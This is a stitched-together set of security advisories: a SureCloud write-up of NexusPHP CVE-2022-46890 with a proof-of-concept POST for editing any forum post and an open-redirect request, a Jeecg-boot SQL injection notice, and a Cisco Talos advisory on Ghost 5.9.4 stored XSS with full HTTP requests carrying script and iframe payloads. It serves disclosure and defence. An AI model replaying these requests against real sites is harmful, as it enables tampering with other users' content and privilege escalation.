Using an ‘HTTPOnly’ flag in-session helps prevent JavaScript from reading content or implementing a Content Security Policy (CSP) header to specify which resources can be executed on the application.

****What is Weak Access Control?****

Access Control regulates which actions can be performed in the application. For example, standard users shouldn’t be able to use or access functionalities only available to administrative users. These controls are created by a programmer, and so are not usually made or enforced by the technology or framework in use.

The main types of access controls are:

*   _**Horizontal access controls –**_ These controls prevent User A from accessing/editing/deleting functionalities belonging to User B

*   _**Vertical access controls –**_ These controls prevent User A from accessing/editing/deleting functionalities belonging to a higher user privilege: e.g., an administrative user

*   _**Context-dependent access controls –**_ These controls prevent any kind of user from subverting the logic of one or multiple application functionalities: e.g., multi-step user journey

****CVE2022-46890 – Weak Access Control****

In this case, the type of weak access control identified within the application was vertical. An authenticated user can edit any post within the forum, even those not accessible or visible to their current role. The attack is made possible because the application did not check the permissions before executing the edit action. 

The proof of concept POST request is as follows: 

_**POST /forums.php?action=post HTTP/1.1**_

_**Host: 192.168.204.137**_

_**Content-Type: application/x-www-form-urlencoded**_

_**Content-Length: 60**_

_**Cookie: <valid session cookies>**_

 _**id=7&type=edit&color=0&font=0&size=0&body=permissions+check2**_

Once the page refreshed, a standard user (user 2) was able to edit the content of a post created by an administrative user.

By enumerating the ‘id’ parameter (incremental numeric digits), it is possible to replace any post created in the forum with a custom message.

Several other misconfigurations were also observed during the code review, but CVEs weren’t requested.

For example, it was possible to access the shout box, a chat box for users of the platform,  from an unauthenticated perspective by simply browsing the URL ‘/shoutbox.php’.

Similarly, the ‘aboutnexus.php’ page was also accessible as an unauthenticated user, which contained sensitive information about the current version of NexusPHP.

Finally, an open redirect was identified and was exploitable from an authenticated perspective. Open redirect can trick the user into landing on an arbitrary page outside of the application’s scope and can be exploited as follows:

_**POST forums.php?action=setsticky  
\[…\]  
topicid=1&returnto=https://www.google.com**_

****Weak Access Control prevention****

To prevent access control vulnerabilities, it is fundamental for programmers to implement the following principles: 

*   All backend pages must check the validity of a user’s session, via a cookie or authentication token, before serving any content

*   When multiple user roles are involved, the web application must consider each role and check if the currently logged-in user is allowed to access such functionality. Do not rely on user input to check the role. A map or matrix on the server must perform this check

*   Access to resources or data belonging to different users must validate if the currently logged-in user is the resource’s owner before being served

*   Avoid using a predictable resource identifier (e.g., numeric or incremental IDs). It is widely recommended to use universally unique identifiers for UUIDs

*   Before publishing the application, implement test cases in the SDLC so that each possible case scenario is tested and triaged in pre-production

****Need some assistance?** ******To find out more about how SureCloud’s products or services can support the security posture of your application and identify vulnerabilities, contact a member of our team or visit www.surecloud.com.****

CVE-2022-46890: NexusPHP - SureCloud Security Review Identifies Authenticated and Unauthenticated Vulnerabilities

Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component `/sys/dict/queryTableData`. A patch was released in commit 0fc374.

**Package**

maven org.jeecgframework.boot:jeecg-boot-base-core (Maven)

**Affected versions**

<= 3.4.4

maven org.jeecgframework.boot:jeecg-module-system (Maven)

GHSA-6w89-c65w-jx2c: Jeecg-boot is vulnerable to SQL injection 

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.

**SUMMARY**

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

**PRODUCT URLS**

Ghost - http://www.ghost.org

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-453 - Insecure Default Variable Initialization

**DETAILS**

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher level user simply previews or visits any post by the malicious user, as these social links seems to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

**CVE-2022-47194 - Twitter**

A stored XSS vulnerability exists in the twitter field for a user.

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 104
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47195 - Facebook**

A stored XSS vulnerability exists in the facebook field for a user:

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 69
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47196 - codeinjection\_head**

A stored XSS vulnerability exists in the codeinjection\_head for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 144
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**CVE-2022-47197 - codeinjection\_foot**

A stored XSS vulnerability exists in the codeinjection\_foot for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 172
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":null,
    "codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**TIMELINE**

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Discovered by Dave McDaniel of Cisco Talos.

Tag

#java